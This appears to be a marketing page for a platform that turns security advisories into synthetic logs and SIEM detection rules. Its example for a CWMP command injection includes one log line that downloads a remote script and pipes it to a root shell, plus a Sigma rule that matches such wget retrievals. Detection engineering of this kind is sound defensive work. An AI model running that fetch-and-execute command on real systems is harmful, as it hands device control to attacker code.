How It Works

The pipeline from sparse research to validated detection.

Built for the gap between a new advisory appearing and a security team having enough evidence to respond with confidence, the workflow turns early research into synthetic logs, candidate detections, and validation context that teams can review before operational handoff.

A visible reasoning chain from source material to final query.

The pipeline does not hide the workflow behind a single generation step. It resolves the chain in order: source intake, synthetic telemetry, structured detection reasoning, and the final reviewable artifact.

Step 01Source grounded

Threat Research Intake

Ingest a vendor advisory, exploit write-up, or analyst notes and anchor the workflow around the behavior that matters now.

source.url = https://vendor.example/advisories/CVE-2026-1042
target.behavior = command injection over management plane
objective = produce reviewable early-stage coverage
Step 02Telemetry simulated

Synthetic Logs Generation

Model the attacker sequence and emit replayable telemetry so detection teams can reason about observables before field logs are mature.

{"ts":"2026-03-21T09:14:26Z","service":"cwmp","action":"Download","device":"openwrt-ap01"}
{"ts":"2026-03-21T09:14:27Z","proc":"sh","argv":"wget http://198.51.100.24/payload.sh | sh","uid":0}
{"ts":"2026-03-21T09:14:29Z","net.dst":"198.51.100.24","proto":"http","bytes_out":1842}
Step 03Signals inferred

Product Detection Inference

Map generated behavior into structured findings, candidate signals, and deployment-ready detection reasoning without treating the output as a black box.

Signal: CWMP Download parameter spawns shell execution
Confidence: root-level execution with remote retrieval behavior
Fields: process.command_line, device.product, network.destination.ip
Step 04Artifact ready

Final Detection Output

Deliver a clean final artifact the team can review, tune, and move into Splunk, Sentinel, or an internal detection library.

title: OpenWRT CWMP Download Command Injection
selection:
  process.command_line|contains: "wget http://"
condition: selection and device.product == "OpenWRT"

What enters the platform, what the core returns, and what the operating layer adds.

What goes in

  • Public advisory URL or full write-up
  • Pasted threat research or intelligence notes
  • Observed telemetry samples or raw event sets
  • Existing detection query for validation

What the core produces

  • Grounded attack-model context
  • Synthetic JSONL telemetry
  • Sigma rules and compiled backend queries
  • Validation and quality-scoring artifacts

What the backend adds

  • Runs, saved detections, and revisions
  • Comments, review states, and collaboration
  • PDF reports, exports, and share links
  • Organizations, billing, roles, and admin governance

Choose the workflow that matches the evidence your team has today.

Four distinct workflow types are already supported. That matters because not every team starts from the same level of evidence, urgency, or operational maturity.

Article to detection

Paste an advisory or write-up when a zero-day is new and field telemetry is still limited. The workflow turns that source into synthetic logs and candidate detections for early coverage.

Source to synthetic logs

Use the core when the main need is replayable telemetry. This is useful when teams want something concrete to reason about before strong production detections exist.

Logs to detection

Start from supplied telemetry when the environment already has evidence. It can then generate detections grounded in what was actually observed.

Query validation

Bring an existing detection query and measure how well it covers the behavior you care about. This is the right path when the team already has content but needs faster validation.

What the platform strengthens, and what it does not replace.

Not a SIEM replacement

It helps teams create and validate detection content faster. The output is meant to feed the SIEM, detection platform, or internal library the team already uses.

Not blind automation

The strongest use case is faster first-pass coverage with analyst review, not automatic promotion of every generated artifact into production.

Built for incomplete early-stage conditions

The product is especially useful when a new vulnerability appears and defenders only have an advisory or early write-up. That is where synthetic logs and candidate detections are most valuable.

Detection queries compiled for every major SIEM platform

Sigma rules are the canonical source of truth. Every backend query compiles directly from the same portable rule.

Splunk

SPL

Search Processing Language queries with field-value pairs and pipeline operators for Splunk SIEM.

Microsoft Sentinel

KQL

Kusto Query Language for Microsoft Sentinel, with table joins and time-series filtering.

Elastic

EQL / KQL / ES|QL

Three Elastic query formats: EQL for event sequences, KQL for keyword filtering, and ES|QL for analytics.

Google SecOps

YARA-L 2.0

YARA-L rules for Google Security Operations Chronicle, structured around entity and event matching.

Palo Alto Cortex XDR

XQL

XDR Query Language for Palo Alto Cortex, with dataset selectors and behavioral correlation.

CrowdStrike

LogScale CQL

Falcon LogScale Composite Query Language for CrowdStrike, optimized for streaming log ingestion.

Sumo Logic

Search Query

Sumo Logic structured search queries with keyword and field-based log filtering.

IBM QRadar

AQL

Ariel Query Language for IBM QRadar SIEM, SQL-style with event and flow database access.

Research foundation

Every stage decision traces back to a published finding.

The pipeline was built by translating seven peer-reviewed papers directly into production engineering decisions. From how attack steps are structured to how detection conditions are filtered, every algorithmic choice has a measurable improvement behind it.

Read the research foundation